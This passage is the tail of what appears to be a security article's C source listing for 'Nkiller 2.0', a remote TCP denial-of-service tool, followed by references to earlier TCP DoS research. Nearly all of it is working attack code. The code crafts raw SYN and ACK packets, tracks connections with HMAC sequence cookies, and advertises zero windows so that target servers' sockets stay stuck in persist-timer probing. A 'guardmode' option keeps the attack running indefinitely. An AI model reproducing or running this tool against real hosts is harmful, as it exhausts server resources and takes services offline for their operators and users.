    "                     persist timer probes.\n"
    "  -w path            URL or GET request to web server. The path of\n"
    "                     a big file (> 4K) should work nicely here.\n"
    "  -r vhost           Virtual host name. This is needed for web\n"
    "                     hosts that support virtual hosting on HTTP1.1\n"
    "  -g                 Guardmode. Continue answering to zero probes \n"
    "                     until the end of times.\n"
    "  -y                 Dynamic port handling.  Remove ports from the\n"
    "                     port list if we get an RST for them. Useful\n"
    "                     when you do not know if one port is open for "
    "sure.\n"
    "  -v                 Verbose mode.\n";

  printf("%s", help_message);
  fflush(stdout);
}


/*
 * Build a TCP packet from its constituents
 */
static char *
build_tcpip_packet(const struct in_addr *source,
    const struct in_addr *target, uint16_t sport, uint16_t dport,
    uint32_t seq, uint32_t ack, uint8_t ttl, uint16_t ipid,
    uint16_t window, uint8_t flags, char *data, uint16_t datalen,
    char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen)
{
  char *packet;
  struct ip *ip;
  struct tcphdr *tcp;
  pseudo_hdr *phdr;
  char *tcpdata;
  /* fake length to account for 16bit word padding chksum */
  unsigned int chklen;    

  if (tcpopt_len % 4)
    fatal("TCP option length must be divisible by 4.\n");

  *packetlen = sizeof(*ip) + sizeof(*tcp) + tcpopt_len + datalen;
  if (*packetlen % 2)
    chklen = *packetlen + 1;
  else 
    chklen = *packetlen;

  packet = xmalloc(chklen + sizeof(*phdr));

  ip = (struct ip *)packet;
  tcp = (struct tcphdr *) ((char *)ip + sizeof(*ip));
  tcpdata = (char *) ((char *)tcp + sizeof(*tcp) + tcpopt_len);

  memset(packet, 0, chklen);

  ip->ip_v = 4;
  ip->ip_hl = 5;
  ip->ip_tos = 0;
  ip->ip_len = *packetlen; /* must be in host byte order for FreeBSD */
  ip->ip_id = htons(ipid); /* kernel will fill with random value if 0 */
  ip->ip_off = 0;
  ip->ip_ttl = ttl;
  ip->ip_p = IPPROTO_TCP;
  ip->ip_sum = checksum_comp((unsigned short *)ip, sizeof(struct ip));
  ip->ip_src.s_addr = source->s_addr;
  ip->ip_dst.s_addr = target->s_addr;

  tcp->th_sport = htons(sport);
  tcp->th_dport = htons(dport);
  tcp->th_seq = seq;
  tcp->th_ack = ack;
  tcp->th_x2 = 0;
  tcp->th_off = 5 + (tcpopt_len / 4);
  tcp->th_flags = flags;
  tcp->th_win = htons(window);
  tcp->th_urp = 0;

  memcpy((char *)tcp + sizeof(*tcp), tcpopt, tcpopt_len);
  memcpy(tcpdata, data, datalen);

  /* pseudo header used for checksumming */
  phdr = (struct pseudo_hdr *) ((char *)packet + chklen);
  phdr->src = source->s_addr;
  phdr->dst = target->s_addr;
  phdr->mbz = 0;
  phdr->proto = IPPROTO_TCP;
  phdr->len = ntohs((tcp->th_off * 4) + datalen);
  /* tcp checksum */
  tcp->th_sum = checksum_comp((unsigned short *)tcp,
      chklen - sizeof(*ip) + sizeof(*phdr));

  return packet;
}


/* 
 * Write the packet to the network and free it from memory
 */
static void
send_packet(char* packet, unsigned int *packetlen)
{
  struct sockaddr_in sin;
  int sockfd, one;

  sin.sin_family = AF_INET;
  sin.sin_port = ((struct tcphdr *)(packet + 
        sizeof(struct ip)))->th_dport;
  sin.sin_addr.s_addr = ((struct ip *)(packet))->ip_dst.s_addr;

  if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    fatal("cannot open socket");

  one = 1;
  setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, (const char *) &one,
      sizeof(one));

  if (sendto(sockfd, packet, *packetlen, 0,
        (struct sockaddr *)&sin, sizeof(sin)) < 0) {
    fatal("sendto error: ");
  }
  close(sockfd);
  free(packet);
}


/*
 * Build TCP timestamp option
 * tcpopt points to possibly already existing TCP options
 * so inspect current TCP option length (tcpopt_len)
 */
static char *
build_timestamp(char **tcpopt, unsigned int *tcpopt_len,
    uint32_t tsval, uint32_t tsecr) 
{
  struct timeval now;
  tcp_timestamp t;
  char *opt;

  if (*tcpopt_len) {
    opt = xrealloc(*tcpopt, *tcpopt_len + sizeof(t));
    *tcpopt = opt;
    opt += *tcpopt_len;
  } else
    *tcpopt = xmalloc(sizeof(t));

  memset(&t, TCPOPT_NOP, sizeof(t));
  t.kind = TCPOPT_TIMESTAMP;
  t.length = 10;
  if (gettimeofday(&now, NULL) < 0)
    fatal("Couldn't get time of day\n");
  t.tsval = htonl((tsval) ? tsval : (uint32_t)now.tv_sec);
  t.tsecr = htonl((tsecr) ? tsecr : 0);

  if (*tcpopt_len)
    memcpy(opt, &t, sizeof(t));
  else 
    memcpy(*tcpopt, &t, sizeof(t));

  *tcpopt_len += sizeof(t);

  return *tcpopt;
}


/*
 * Build TCP Maximum Segment Size option
 */
static char *
build_mss(char **tcpopt, unsigned int *tcpopt_len, uint16_t mss)
{
  struct tcp_mss t;
  char *opt;

  if (*tcpopt_len) {
    opt = realloc(*tcpopt, *tcpopt_len + sizeof(t));
    *tcpopt = opt;
    opt += *tcpopt_len;
  } else
    *tcpopt = xmalloc(sizeof(t));

  memset(&t, TCPOPT_NOP, sizeof(t));
  t.kind = TCPOPT_MAXSEG;
  t.length = 4;
  t.mss = htons(mss);

  if (*tcpopt_len)
    memcpy(opt, &t, sizeof(t));
  else 
    memcpy(*tcpopt, &t, sizeof(t));

  *tcpopt_len += sizeof(t);
  return *tcpopt;
}


/* 
 * Perform pcap polling (until a certain timeout) and
 * return the packet you got - also check that the
 * packet we get is something we were expecting, according
 * to the reverse cookie we had set in the tcp seq field.
 * Returns the virtual state that the reply denotes and which
 * we differentiate from each other based on packet parsing techniques.
 */
static int 
check_replies(HostInfo *Target, SniffInfo *Sniffer, u_char **reply)
{

  int timedout = 0;
  int goodone = 0;
  const u_char *packet = NULL;
  uint32_t decoded_seq;
  uint32_t ack, calc_ack;
  int state;
  uint16_t datagram_len;
  uint32_t datalen;
  struct Sock sockinfo;
  struct pcap_pkthdr phead;
  const struct ip *ip;
  const struct tcphdr *tcp;
  struct timeval now, wait;
  uint32_t tsval, tsecr;
  uint32_t time_elapsed = 0;

  state = 0;

  if (gettimeofday(&wait, NULL) < 0)
    fatal("Couldn't get time of day\n");
  /* poll for 'polltime' micro seconds */
  wait.tv_usec += o.polltime;

  do {
    datagram_len = 0;
    packet = pcap_next(Sniffer->pd, &phead);
    if (gettimeofday(&now, NULL) < 0)
      fatal("Couldn't get time of day\n");
    if (TIMEVAL_SUBTRACT(wait, now) < 0)
      timedout++;

    if (packet == NULL)
      continue;

    /* This only works on Ethernet - be warned */
    if (*(packet + 12) != 0x8) {
      break; /* not an IPv4 packet */
    }

    ip = (const struct ip *) (packet + SIZE_ETHERNET);

    /* 
     * TCP/IP header checking - end cases are more than the ones
     * checked below but are so rarely happening that for
     * now we won't go into trouble to validate - could also
     * use validedpkt() from nmap/tcpip.cc
     */
    if (ip->ip_hl < 5) {
      if (o.debug2)
        (void) fprintf(stderr, "IP header < 20 bytes\n");
      break;
    }
    if (ip->ip_p != IPPROTO_TCP) {
      if (o.debug2)
        (void) fprintf(stderr, "Packet not TCP\n");
      break;
    }

    datagram_len = ntohs(ip->ip_len); /* Save length for later */

    tcp = (const void *) ((const char *)ip + ip->ip_hl * 4);
    if (tcp->th_off < 5) {
      if (o.debug2)
        (void) fprintf(stderr, "TCP header < 20 bytes\n");
      break;
    }

    datalen = datagram_len - (ip->ip_hl * 4) - (tcp->th_off * 4);

    /* A non-ACK packet is nothing valid */
    if (!(tcp->th_flags & TH_ACK))
      break; 

    /* 
     * We swap the values accordingly since we want to
     * check the result with the 4tuple we had created
     * when sending our own syn probe
     */
    sockinfo.saddr.s_addr = ip->ip_dst.s_addr;
    sockinfo.daddr.s_addr = ip->ip_src.s_addr;
    sockinfo.sport = ntohs(tcp->th_dport);
    sockinfo.dport = ntohs(tcp->th_sport);
    decoded_seq = calc_cookie(&sockinfo);

    if (tcp->th_flags & (TH_SYN|TH_RST)) {

      ack = ntohl(tcp->th_ack) - 1;
      calc_ack = ntohl(decoded_seq);
      /* 
       * We can't directly compare two values returned by
       * the ntohl functions
       */
      if (ack != calc_ack)
        break;

      /* OK we got a reply to something we have sent */

      /* SYNACK case */
      if (tcp->th_flags & TH_SYN) {

        if (o.dynamic && port_exists(Target, sockinfo.dport)) {
          if (o.debug2)
            (void) fprintf(stderr, "Port doesn't exist in list "
                "- probably removed it before due to an RST and dynamic "
                "handling\n");
          break;
        }
        if (o.debug)
          (void) fprintf(stdout,
              "Got SYN packet with seq: %x our port: %u "
              "target port: %u\n", decoded_seq,
              sockinfo.sport, sockinfo.dport);

        goodone++;
        state = S_SYNACK;

        /* ERR case */
      } else if (tcp->th_flags & TH_RST) {

        /* 
         * If we get an RST packet this means that the port is
         * closed and thus we remove it from our port list.
         */
        if (o.debug2)
          (void) fprintf(stdout,
              "Oops! Got an RST packet with seq: %x "
              "port %u is closed\n",decoded_seq,
              sockinfo.dport);
        if (o.dynamic)
          port_remove(Target, sockinfo.dport);
      } 
    } else {
      /* 
       * Each subsequent ACK that we get will have the
       * same acknowledgment number since we won't be sending
       * any more data to the target.
       */
      ack = ntohl(tcp->th_ack);
      calc_ack = ntohl(decoded_seq) + Target->wlen + 1;

      if (ack != calc_ack) 
        break;

      struct timeval now;
      if (get_timestamp(tcp, &tsval, &tsecr)) {
        if (gettimeofday(&now, NULL) < 0)
          fatal("Couldn't get time of day\n");
        time_elapsed = now.tv_sec - tsecr;
        if (o.debug) 
          (void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n",
              time_elapsed, sockinfo.sport);
      } else 
        (void) fprintf(stdout, "Warning: No timestamp available from "
            "target host's reply. Chaotic behaviour imminent...\n");

      /* 
       * First Data Acknowledgment case (FDACK)
       * Note that this packet may not always appear, since there
       * is a chance that it will be piggybacked with the first
       * sending data of the peer, depending on whether the delayed
       * acknowledgment timer expired or not at the peer side.
       * Practically, we choose to ignore it and wait until
       * we receive actual data.
       */
      if (ack == calc_ack && (!datalen || datalen == 1)
          && time_elapsed < o.probe_interval) {
        state = S_FDACK;
        break;
      }

      /* 
       * Data - victim sent the first packet(s) of data
       */
      if (ack == calc_ack && datalen > 1) {
        if (tcp->th_flags & TH_PUSH) {
          state = S_DATA_1;
          goodone++;
          break;
        } else {
          state = S_DATA_0;
          goodone++;
          break;
        }
      }

      /* 
       * Persist (Probe) Timer reply
       * The time_elapsed limit must be at least equal to the product:
       * ('persist_timer_interval' * '/proc/sys/net/ipv4/tcp_retries2')
       * or else we might lose an important probe and fail to ack it
       * On Linux: persist_timer_interval = about 2 minutes (after it has
       * stabilized) and tcp_retries2 = 15 probes.
       * Note we check 'datalen' for both 0 and 1 since Linux probes
       * with 0 data, while *BSD/Windows probe with 1 byte of data
       */
      if (ack == calc_ack && (!datalen || datalen == 1) 
          && time_elapsed >= o.probe_interval) {
        state = S_PROBE;
        goodone++;
        break;
      }

    }

  } while (!timedout && !goodone);

  if (goodone) {
    *reply = xmalloc(datagram_len);
    memcpy(*reply, packet + SIZE_ETHERNET, datagram_len);
  }

  return state;
}


/* 
 * Parse TCP options and get timestamp if it exists.
 * Return 1 if timestamp valid, 0 for failure
 */
int
get_timestamp(const struct tcphdr *tcp, uint32_t *tsval, uint32_t *tsecr)
{
  u_char *p;
  unsigned int op;
  unsigned int oplen;
  unsigned int len = 0;

  if (!tsval || !tsecr)
    return 0;

  p = ((u_char *)tcp) + sizeof(*tcp);
  len = 4 * tcp->th_off - sizeof(*tcp);

  while (len > 0 && *p != TCPOPT_EOL) {
    op = *p++;
    if (op == TCPOPT_EOL)
      break;
    if (op == TCPOPT_NOP) {
      len--;
      continue;
    }
    oplen = *p++;
    if (oplen < 2) 
      break;
    if (oplen > len)
      break; /* not enough space */
    if (op == TCPOPT_TIMESTAMP && oplen == 10) {
      /* legitimate timestamp option */
      if (tsval) { 
        memcpy((char *)tsval, p, 4); 
        *tsval = ntohl(*tsval); 
      }
      p += 4;
      if (tsecr) { 
        memcpy((char *)tsecr, p, 4);
        *tsecr = ntohl(*tsecr);
      }
      return 1;
    }
    len -= oplen;
    p += oplen - 2;
  }
  *tsval = 0;
  *tsecr = 0;
  return 0;
}


/* 
 * Craft SYN initiating probe
 */
static void
send_syn_probe(HostInfo *Target, SniffInfo *Sniffer)
{
  char *packet;
  char *tcpopt;
  uint16_t sport, dport;
  uint32_t encoded_seq;
  unsigned int packetlen, tcpopt_len;
  Sock *sockinfo;

  tcpopt_len = 0;
  sockinfo = xmalloc(sizeof(*sockinfo));

  sport = (1024 + random()) % 65536;
  dport = port_get_random(Target);

  /* Calculate reverse cookie and encode value into sequence number */
  sockinfo->saddr.s_addr = Sniffer->saddr.s_addr;
  sockinfo->daddr.s_addr = Target->daddr.s_addr;
  sockinfo->sport = sport;
  sockinfo->dport = dport;
  encoded_seq = calc_cookie(sockinfo);

  /* Build tcp options - timestamp, mss */
  tcpopt = build_timestamp(&tcpopt, &tcpopt_len, 0, 0);
  tcpopt = build_mss(&tcpopt, &tcpopt_len, 1024);

  packet = build_tcpip_packet(
      &Sniffer->saddr,
      &Target->daddr,
      sport,
      dport,
      encoded_seq,
      0,
      64,
      random() % (uint16_t)~0,
      1024,
      TH_SYN,
      NULL,
      0,
      tcpopt,
      tcpopt_len,
      &packetlen
      );

  send_packet(packet, &packetlen);

  free(tcpopt);
  free(sockinfo);
}


/* 
 * Generic probe function: depending on the value of 'state' as
 * denoted by check_replies() earlier, we trigger a different probe
 * behaviour, taking also into account any network stack templates.
 */
static int
send_probe(const u_char *reply, HostInfo *Target, int state)
{
  char *packet;
  unsigned int packetlen;
  uint32_t ack;
  char *tcpopt;
  unsigned int tcpopt_len;
  int validstamp;
  uint32_t tsval, tsecr;
  struct ip *ip;
  struct tcphdr *tcp;
  uint16_t datalen;
  uint16_t window;
  int payload = 0;

  validstamp = 0;
  tcpopt_len = 0;

  ip = (struct ip *)reply;
  tcp = (struct tcphdr *)((char *)ip + ip->ip_hl * 4);
  datalen = ntohs(ip->ip_len) - (ip->ip_hl * 4) - (tcp->th_off * 4);

  switch (state) {
    case S_SYNACK:
      ack = ntohl(tcp->th_seq) + 1;
      window = 1024;
      payload++;
      break;
    case S_DATA_0:
      ack = ntohl(tcp->th_seq) + datalen;
      if (o.template == T_BSDWIN) 
        window = 0;
      else 
        window = 512;
      break;
    case S_DATA_1:
      ack = ntohl(tcp->th_seq) + datalen;
      window = 0;
      break;
    case S_PROBE:
      ack = ntohl(tcp->th_seq);
      window = 0;
      break;
    default:    /* we shouldn't get here */
      ack = ntohl(tcp->th_seq);
      window = 0;
      break;
  }

  if (get_timestamp(tcp, &tsval, &tsecr)) {
    validstamp++;
    tcpopt = build_timestamp(&tcpopt, &tcpopt_len, 0, tsval);
  }

  packet = build_tcpip_packet(
      &ip->ip_dst,  /* mind the swapping */
      &ip->ip_src,
      ntohs(tcp->th_dport),
      ntohs(tcp->th_sport),
      tcp->th_ack, /* as seq field */
      htonl(ack),
      64,
      random() % (uint16_t)~0,
      window,
      TH_ACK,
      (payload) ? ((ntohs(tcp->th_sport) == 80) 
        ? Target->url : Target->payload) : NULL,
      (payload) ? ((ntohs(tcp->th_sport) == 80) 
        ? Target->wlen : Target->plen) : 0,
      (validstamp) ? tcpopt : NULL,
      (validstamp) ? tcpopt_len : 0,
      &packetlen
      );

  send_packet(packet, &packetlen);
  free(tcpopt);

  return 0;
}


/* 
 * Reverse(or client) syn_cookie function - encode the 4tuple
 * { src ip, src port, dst ip, dst port } and a secret key into 
 * the sequence number, thus keeping info of the packet inside itself
 * (idea taken by scanrand - Nmap uses an equivalent technique too)
 */
static uint32_t
calc_cookie(Sock *sockinfo)
{

  uint32_t seq;
  unsigned int cookie_len;
  unsigned int input_len;
  unsigned char *input;
  unsigned char cookie[EVP_MAX_MD_SIZE];

  input_len = sizeof(*sockinfo);
  input = xmalloc(input_len);
  memcpy(input, sockinfo, sizeof(*sockinfo));

  /* Calculate a sha1 hash based on the quadruple and the skey */
  HMAC(EVP_sha1(), (char *)o.skey, strlen(o.skey), input, input_len,
      cookie, &cookie_len);

  free(input);

  /* Get only the first 32 bits of the sha1 hash */
  memcpy(&seq, &cookie, sizeof(seq));
  return seq;
}


static void
sniffer_init(HostInfo *Target, SniffInfo *Sniffer)
{
  char errbuf[PCAP_ERRBUF_SIZE];
  struct bpf_program bpf;
  struct pcap_addr *address;
  struct sockaddr_in *ip;
  char filter[27];

  strncpy(filter, "src host ", sizeof(filter));
  strncpy(&filter[sizeof("src host ")-1], inet_ntoa(Target->daddr), 16);
  if (o.debug)
    (void) fprintf(stdout, "Filter: %s\n", filter);

  if ((pcap_findalldevs(&Sniffer->dev, errbuf)) == -1)
    fatal("%s: pcap_findalldevs(): %s\n", __func__, errbuf);

  address = Sniffer->dev->addresses; 
  address = address->next;           /* first address is garbage */    

  if (address->addr) {
    ip = (struct sockaddr_in *) address->addr;
    memcpy(&Sniffer->saddr, &ip->sin_addr, sizeof(struct in_addr));
    if (o.debug) {
      (void) fprintf(stdout, "Local IP: %s\nDevice name: "
          "%s\n", inet_ntoa(Sniffer->saddr), Sniffer->dev->name);
    }
  } else
    fatal("%s: Couldn't find associated IP with interface %s\n",
        __func__, Sniffer->dev->name);

  if (!(Sniffer->pd = 
        pcap_open_live(Sniffer->dev->name, BUFSIZ, 0, 0, errbuf)))
    fatal("%s: Could not open device %s: error: %s\n ", __func__,
        Sniffer->dev->name, errbuf);

  if (pcap_compile(Sniffer->pd , &bpf, filter, 0, 0) == -1)
    fatal("%s: Couldn't parse filter %s: %s\n ", __func__, filter,
        pcap_geterr(Sniffer->pd));

  if (pcap_setfilter(Sniffer->pd, &bpf) == -1)
    fatal("%s: Couldn't install filter %s: %s\n", __func__, filter,
        pcap_geterr(Sniffer->pd));

  if (pcap_setnonblock(Sniffer->pd, 1, NULL) < 0)
    fprintf(stderr, "Couldn't set nonblocking mode\n");
}


static uint16_t *
port_parse(char *portarg, unsigned int *portlen)
{
  char *endp;
  uint16_t *ports;
  unsigned int nports;
  unsigned long pvalue;
  char *temp;
  *portlen = 0;

  ports = xmalloc(65535 * sizeof(uint16_t));
  nports = 0;

  while (nports < 65535) {
    if (nports == 0)
      temp = strtok(portarg, ",");
    else
      temp = strtok(NULL, ",");

    if (temp == NULL)
      break;

    endp = NULL;
    errno = 0;
    pvalue = strtoul(temp, &endp, 0);
    if (errno != 0 || *endp != '\0') {
      fprintf(stderr, "Invalid port number: %s\n",
          temp);
      goto cleanup;
    }

    if (pvalue > IPPORT_MAX) {
      fprintf(stderr, "Port number too large: %s\n",
          temp);
      goto cleanup;
    }

    ports[nports++] = (uint16_t)pvalue;
  }
  if (portlen != NULL)
    *portlen = nports;
  return ports;

cleanup:
  free(ports);
  return NULL;
}


/*
 * Check if port is in list, return 0 if it is, -1 if not
 * (similar to port_remove in logic)
 */
static int
port_exists(HostInfo *Target, uint16_t port)
{
  port_elem *current;
  port_elem *before;

  current = Target->ports.first;
  before = Target->ports.first;

  while (current->port_val != port && current->next != NULL) {
    before = current;
    current = current->next;
  }

  if (current->port_val != port && current->next == NULL) {
    if (o.debug2)
      (void) fprintf(stderr, "%s: port %u doesn't exist in "
          "list\n", __func__, port);
    return -1;
  } else
    return 0;
}


/* 
 * Remove specific port from portlist
 */
static void
port_remove(HostInfo *Target, uint16_t port)
{
  port_elem *current;
  port_elem *before;

  current = Target->ports.first;
  before = Target->ports.first;

  while (current->port_val != port && current->next != NULL) {
    before = current;
    current = current->next;
  }

  if (current->port_val != port && current->next == NULL) {
    if (current != Target->ports.first) {
      if (o.debug2)
        (void) fprintf(stderr, "Port %u not found in list\n", port);
      return;
    }
  }

  if (current != Target->ports.first) {
    before->next = current->next;
  } else {
    Target->ports.first = current->next;
  }
  Target->portlen--;
  if (!Target->portlen)
    fatal("No port left to hit!\n");
}


/*
 * Add new port to port linked list of Target
 */
static void
port_add(HostInfo *Target, uint16_t port)
{
  port_elem *current;
  port_elem *newNode;

  newNode = xmalloc(sizeof(*newNode));

  newNode->port_val = port;
  newNode->next = NULL;

  if (Target->ports.first == NULL) {
    Target->ports.first = newNode;
    Target->ports.last = newNode;
    return;
  }

  current = Target->ports.last;
  current->next = newNode;
  Target->ports.last = newNode;
}


/* 
 * Return a random port from portlist
 */
static uint16_t
port_get_random(HostInfo *Target)
{
  port_elem *temp;
  unsigned int i, offset;

  temp = Target->ports.first;
  offset = (random() % Target->portlen);
  i = 0;
  while (i < offset) {
    temp = temp->next;
    i++;
  }
  return temp->port_val;
}


/*
 * Prepare the payload that will be sent in the 3rd phase
 * of the Connection-estalishment handshake (piggypacked
 * along with the ACK of the peer's SYNACK)
 */
static void
handle_payloads(HostInfo *Target)
{
  if (o.payload[0]) {
    Target->plen = strlen(o.payload);
    Target->payload = xmalloc(Target->plen);
    strncpy(Target->payload, o.payload, Target->plen);
  } else {
    Target->payload = NULL;
    Target->plen = 0;
  }

  if (o.path[0]) {
    if (o.vhost[0]) {
      Target->wlen = strlen(o.path) + strlen(o.vhost) +
        sizeof("GET  HTTP/1.0\015\012Host: \015\012\015\012") - 1;
      Target->url = xmalloc(Target->wlen + 1);
      /* + 1 for trailing '\0' of snprintf()  */
      snprintf(Target->url, Target->wlen + 1, 
          "GET %s HTTP/1.0\015\012Host: %s\015\012\015\012",
          o.path, o.vhost);
    } else {
      Target->wlen = strlen(o.path) + 
        sizeof("GET  HTTP/1.0\015\012\015\012") - 1;
      Target->url = xmalloc(Target->wlen + 1); 
      snprintf(Target->url, Target->wlen + 1, 
          "GET %s HTTP/1.0\015\012\015\012", o.path);
    }
  } else {
    Target->wlen = sizeof(WEB_PAYLOAD) - 1;
    Target->url = xmalloc(Target->wlen);
    memcpy(Target->url, WEB_PAYLOAD, Target->wlen);
  }
}


/* No way you have seen this before! */
static uint16_t
checksum_comp(uint16_t *addr, int len)
{
  register long sum = 0;
  uint16_t checksum;
  int count = len;
  uint16_t temp;

  while (count > 1)  {
    temp = *addr++;
    sum += temp;
    count -= 2;
  }
  if (count > 0)
    sum += *(char *) addr;

  while (sum >> 16)
    sum = (sum & 0xffff) + (sum >> 16);

  checksum = ~sum;
  return checksum;
}


int
main(int argc, char **argv)
{
  int print_help;
  int opt;
  int required;
  int debug_level;
  size_t i;
  unsigned int portlen;
  unsigned int probes, probes_sent, probes_left;
  unsigned int probes_this_rnd, probes_rnd_fini;
  int unlimited, state, probe_byusr;
  HostInfo *Target;
  SniffInfo *Sniffer;
  u_char *reply;
  char *endp; 

  srandom(time(0));

  if (argc == 1) {
    usage();
  }

  memset(&o, 0, sizeof(o));
  unlimited = 0;
  required = 0;
  portlen = 0;
  print_help = 0;
  probe_byusr = 0;

  probes = DEFAULT_NUM_PROBES;
  o.sleep = DEFAULT_SLEEP_TIME;
  o.probes_per_rnd = DEFAULT_PROBES_RND;
  o.probe_interval = DEFAULT_PROBE_INTERVAL;
  strncpy(o.skey, DEFAULT_KEY, sizeof(o.skey));
  o.polltime = DEFAULT_POLLTIME;

  /* Option parsing */
  while ((opt = getopt(argc, argv, "t:k:l:w:c:p:n:vd:s:r:N:T:P:yhg"))
      != -1)
  {
    switch (opt)
    {
      case 't':   /* target address */
        strncpy(o.target, optarg, sizeof(o.target));
        required++;
        break;
      case 'k':   /* secret key */
        strncpy(o.skey, optarg, sizeof(o.skey));
        break;
      case 'l':   /* payload */
        strncpy(o.payload, optarg, sizeof(o.payload) - 1);
        break;
      case 'w':  /* path */
        strncpy(o.path, optarg, sizeof(o.path) - 1);
        break;
      case 'r':    /* vhost name */
        strncpy(o.vhost, optarg, sizeof(o.vhost) -1);
        break;
      case 'c':   /* polltime */
        endp = NULL;
        o.polltime = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid polltime: %s\n", optarg);
        break;
      case 'p':   /* destination port */
        if (!(o.portlist = port_parse(optarg, &portlen))) 
          fatal("Couldn't parse ports!\n");
        required++;
        break;
      case 'n':   /* number of probes */
        endp = NULL;
        o.probes = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probe number: %s\n", optarg);
        probe_byusr++;
        if (!o.probes) {
          unlimited++;
          probe_byusr = 0;
        }
        break;
      case 'N':    /* probes per round */
        endp = NULL;
        o.probes_per_rnd = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probes-per-round number: %s\n", optarg);
        break;
      case 'T':    /* template number */
        endp = NULL;
        o.template = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid template number: %s\n", optarg);
        break;
      case 'P':    /* probe timer interval */
        endp = NULL;
        o.probe_interval = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probe-interval number: %s\n", optarg);
        break;
      case 'g':  /* guard mode */
        o.guardmode++;
        break;
      case 'v':  /* verbose mode */
        o.verbose++;
        break;
      case 'd':  /* debug mode */
        endp = NULL;
        debug_level = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probe number: %s\n", optarg);
        if (debug_level != 1 && debug_level != 2)
          fatal("Debug level must be either 1 or 2\n");
        else if (debug_level == 1)
          o.debug++;
        else {
          o.debug2++;
          o.debug++;
        }
        break;
      case 's':   /* sleep time between each probe */
        endp = NULL;
        o.sleep = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid sleep number: %s\n", optarg);
        break;
      case 'y':   /* dynamic port handling */
        o.dynamic++;
        break;
      case 'h':   /* help - usage */
        print_help = 1;
        break;
      case '?':   /* error */
        usage();
        break;
    }
  }

  if (print_help) {
    help();
    exit(EXIT_SUCCESS);
  }

  if (getuid() && geteuid())
    fatal("You need to be root.\n");

  if (required < 2)
    fatal("You have to define both -t <target> and -p <portlist>\n");

  (void) fprintf(stdout, "\nStarting Nkiller 2.0 "
      "( http://sock-raw.org )\n");

  Target = xmalloc(sizeof(HostInfo));
  Sniffer = xmalloc(sizeof(SniffInfo));

  Target->portlen = portlen;
  for (i = 0; i < Target->portlen; i++)
    port_add(Target, o.portlist[i]);

  if (!unlimited && probe_byusr)
    probes = o.probes;

  inet_pton(AF_INET, o.target, &Target->daddr);

  handle_payloads(Target);
  sniffer_init(Target, Sniffer);

  if (o.verbose) {
    if (unlimited) 
      (void) fprintf(stdout, "Probes: unlimited\n");
    else 
      (void) fprintf(stdout, "Probes: %u\n", probes);
    (void) fprintf(stdout, 
        "Probes per round: %u\n"
        "Pcap polling time: %u microseconds\n"
        "Sleep time: %u microseconds\n"
        "Key: %s\n"
        "Probe interval: %u seconds\n"
        "Template: %s\n", o.probes_per_rnd, o.polltime,
        o.sleep, o.skey, o.probe_interval, get_template(o.template));
    if (o.guardmode)
      (void) fprintf(stdout, "Guardmode on\n");
  }

  probes_sent = 0;
  probes_left = probes;
  probes_rnd_fini = 0;
  probes_this_rnd = 0;

  /* Main loop */
  while (probes_left || o.guardmode || unlimited) {

    if (probes_rnd_fini >= o.probes_per_rnd) {
      probes_rnd_fini = 0;
      probes_this_rnd = 0;
    }

    if (!unlimited && probes_left == (0.5 * probes) && o.verbose)
      (void) fprintf(stdout, "Half of probes left.\n");

    if (probes_sent < probes && probes_this_rnd < o.probes_per_rnd) {
      send_syn_probe(Target, Sniffer);
      if (!unlimited)
        probes_sent++;
      probes_this_rnd++;
    }

    usleep(o.sleep);  /* Wait a bit before each probe */

    state = check_replies(Target, Sniffer, &reply);

    switch (state) 
    {
      case S_ERR: 
        continue;
        break;
      case S_SYNACK:
        send_probe(reply, Target, S_SYNACK);
        free(reply);
        break;
      case S_FDACK:
        continue;
        break;
      case S_PROBE:
        send_probe(reply, Target, S_PROBE);
        free(reply);
        probes_rnd_fini++;
        if (!unlimited)
          probes_left--;
        break;
      case S_DATA_0:
        send_probe(reply, Target, S_DATA_0);
        free(reply);
        if (o.template == T_BSDWIN)
          probes_rnd_fini++;
        break;
      case S_DATA_1:
        send_probe(reply, Target, S_DATA_1);
        free(reply);
        /* Increase aggressiveness */
        probes_rnd_fini++; 
        break;
      default:
        break;
    }

  }

  (void) fprintf(stdout, "Finished.\n");
  exit(EXIT_SUCCESS);
}


-- [ 6 - References

[1]. netkill - generic remote DoS attack by stanislav shalunov -
http://seclists.org/bugtraq/2000/Apr/0152.html

[2]. TCP DoS Vulnerabilities by Fabian 'fabs' Yamaguchi -
http://www.recurity-labs.com/content/pub/25C3TCPVulnerabilities.pdf

[3]. TCP/IP Illustrated vol. 1 - W. Richard Stevens

[4]. Linux Kernel Development (Chapter 10 - Timers and Time Management)
  - Robert Love

Additional related material:

[5]. Understanding Linux Network Internals (O'reilly)

[6]. Understanding the Linux Kernel (O'reilly)

[7]. Dave Miller's TCP notes:
      - http://vger.kernel.org/~davem/tcp_output.html
      - http://vger.kernel.org/~davem/tcp_skbcb.html

[8]. The Design and Implementation of the FreeBSD Operating System

--------[ EOF